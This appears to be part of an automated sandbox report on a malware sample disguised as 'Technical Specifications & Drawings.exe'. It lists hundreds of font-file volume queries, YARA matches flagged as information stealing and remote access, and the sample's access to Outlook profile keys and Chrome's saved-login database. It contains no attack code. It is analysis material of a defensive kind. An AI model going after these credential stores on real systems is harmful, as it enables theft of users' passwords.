          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

Source: Yara match | File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\control.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

Source: Yara match | File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
